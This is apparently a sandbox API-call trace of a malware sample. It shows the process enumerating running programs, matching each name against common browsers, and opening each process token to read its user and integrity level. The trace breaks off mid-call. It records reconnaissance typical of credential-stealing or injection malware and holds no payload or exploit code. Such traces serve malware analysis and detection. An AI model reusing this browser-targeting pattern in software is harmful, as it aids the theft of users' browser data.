[0241.190] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.191] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0241.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0241.191] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.191] GetLastError () returned 0x7a [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.191] CloseHandle (hObject=0x340) returned 1 [0241.191] CloseHandle (hObject=0x548) returned 1 [0241.191] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.191] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.191] GetLastError () returned 0x7a [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.191] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.191] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.191] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.191] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0241.191] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.191] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.191] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.191] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0241.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0241.191] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.191] GetLastError () returned 0x7a [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.191] CloseHandle (hObject=0x340) returned 1 [0241.191] CloseHandle (hObject=0x548) returned 1 [0241.191] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.191] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.191] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.191] GetLastError () returned 0x7a [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.192] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.192] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.192] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.192] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.192] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.192] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.192] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.192] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0241.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0241.192] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.192] GetLastError () returned 0x7a [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.192] CloseHandle (hObject=0x340) returned 1 [0241.192] CloseHandle (hObject=0x548) returned 1 [0241.192] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.192] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.192] GetLastError () returned 0x7a [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.192] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.192] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.192] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0241.192] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0241.192] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0241.192] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0241.192] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0241.192] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0241.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0241.192] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.192] GetLastError () returned 0x7a [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.192] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.192] CloseHandle (hObject=0x340) returned 1 [0241.193] CloseHandle (hObject=0x548) returned 1 [0241.193] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.193] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.193] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.193] GetLastError () returned 0x7a [0241.193] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.193] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.193] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.193] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0241.193] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0241.193] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0241.193] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0241.193] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0241.193] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0241.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0241.193] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.193] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.193] GetLastError () returned 0x7a [0241.193] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.193] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.193] CloseHandle (hObject=0x340) returned 1 [0241.193] CloseHandle (hObject=0x548) returned 1 [0241.193] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.193] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.193] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.193] GetLastError () returned 0x7a [0241.193] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.193] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.193] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.193] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0241.193] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0241.193] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0241.193] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0241.193] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0241.193] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0241.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0241.194] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.194] GetLastError () returned 0x7a [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.194] CloseHandle (hObject=0x340) returned 1 [0241.194] CloseHandle (hObject=0x548) returned 1 [0241.194] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.194] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.194] GetLastError () returned 0x7a [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.194] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.194] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.194] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0241.194] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0241.194] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0241.194] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0241.194] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0241.194] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0241.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0241.194] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.194] GetLastError () returned 0x7a [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.194] CloseHandle (hObject=0x340) returned 1 [0241.194] CloseHandle (hObject=0x548) returned 1 [0241.194] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.194] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.194] GetLastError () returned 0x7a [0241.194] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.194] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.195] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.195] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.195] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0241.195] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.195] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.195] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.195] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0241.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0241.195] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.195] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.195] GetLastError () returned 0x7a [0241.195] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.195] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.195] CloseHandle (hObject=0x340) returned 1 [0241.195] CloseHandle (hObject=0x548) returned 1 [0241.195] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.195] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.195] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.195] GetLastError () returned 0x7a [0241.195] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.195] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.195] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.195] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0241.195] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0241.195] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0241.195] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0241.195] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0241.195] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0241.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0241.195] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.195] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.195] GetLastError () returned 0x7a [0241.195] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.195] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.195] CloseHandle (hObject=0x340) returned 1 [0241.195] CloseHandle (hObject=0x548) returned 1 [0241.196] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.196] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.196] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.196] GetLastError () returned 0x7a [0241.196] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.196] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.196] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.196] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0241.196] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0241.196] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0241.196] lstrcmpiW 